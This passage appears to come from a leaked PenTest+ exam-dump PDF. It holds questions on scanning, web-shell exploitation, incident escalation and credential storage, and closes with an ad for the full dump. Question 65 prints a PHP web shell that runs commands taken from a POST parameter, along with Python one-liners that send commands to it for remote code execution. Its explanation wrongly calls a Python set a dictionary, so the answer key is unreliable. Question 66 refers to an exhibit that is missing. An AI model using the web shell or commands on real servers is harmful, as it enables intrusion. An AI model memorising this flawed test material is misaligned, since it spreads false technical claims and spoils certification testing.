Answer: D,E

64.A consultant just performed a SYN scan of all the open ports on a remote host and now needs to
remotely identify the type of services that are running on the host.
Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this
task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer
Answer: C

65. During an engagement, a penetration tester was able to upload to a server a PHP file with the
following content:
<? php system ($_POST['cmd']) ?>
Which of the following commands should the penetration tester run to successfully achieve RCE?
A. python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php',
data={'cmd=id'}))"
B. python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php', data=
('cmd':'id') ) .text) "
C. python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php',
params= {'cmd':'id'}) )"
D. python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php',
params= ('cmd':'id'}) .text) "
Answer: A
Explanation:
The PHP file uploaded by the penetration tester allows for Remote Code Execution (RCE) by
executing the command supplied through the cmd POST parameter. To exploit this, the penetration
tester needs to send a POST request to the PHP file with the command they want to execute. Among
the given options, Option A is the most suitable for achieving RCE:
It uses Python's requests library to send a POST request, which is appropriate because the PHP
script expects data through the POST method.
The data parameter in the requests.post function is correctly formatted as a dictionary, which is the
expected format for sending form data in POST requests. It includes the key cmd with the value id,
which is a common command used to display the current user ID and group ID.
The only minor issue with Option A is that it prints the entire response object, which includes not just
the response content but also metadata like status code and headers. To print just the response
content (which would include the output of the id command), appending .text to the requests.post call
would be more precise, but this is a small detail and does not affect the execution of the command.
The other options have various issues:
Option B is close but has a syntax error in the data argument. It uses parentheses () instead of curly
braces {} for the dictionary, and also lacks the .text at the end to print the response content.
Options C and D use the requests.get method, which is not suitable in this scenario because the PHP
script is expecting data through the POST method, not the GET method. Additionally, Option D has a
syntax error similar to Option B.

66.A penetration tester is conducting a penetration test and discovers a vulnerability on a web server
that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell.
Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?

A. Close the reverse shell the tester is using.
B. Note this finding for inclusion in the final report.
C. Investigate the high numbered port connections.
D. Contact the client immediately.
Answer: D

67. A penetration tester was able to gain access to a plaintext file on a user workstation. Upon
opening the file, the tester notices some strings of randomly generated text. The tester is able to use
these strings to move laterally throughout the network by accessing the fileshare on a web
application.
Which of the following should the organization do to remediate the issue?
A. Sanitize user input.
B. Implement password management solution.
C. Rotate keys.
D. Utilize certificate management.
Answer: B
Explanation:
The presence of plaintext strings that can be used to move laterally across the network suggests that
 passwords or sensitive tokens are stored insecurely. Implementing a password management solution
would help mitigate this issue by ensuring that passwords are stored securely and are not exposed in
plaintext. Password managers typically use strong encryption to protect stored credentials and
provide secure access to them.
Sanitizing user input, rotating keys, and utilizing certificate management address different aspects of
security but do not directly resolve the issue of insecure password storage.
Reference: Importance of password management: NIST Password Guidelines
Examples of security breaches due to poor password management practices: Forge.

Get PT0-002 exam dumps full version.

Powered by TCPDF (www.tcpdf.org)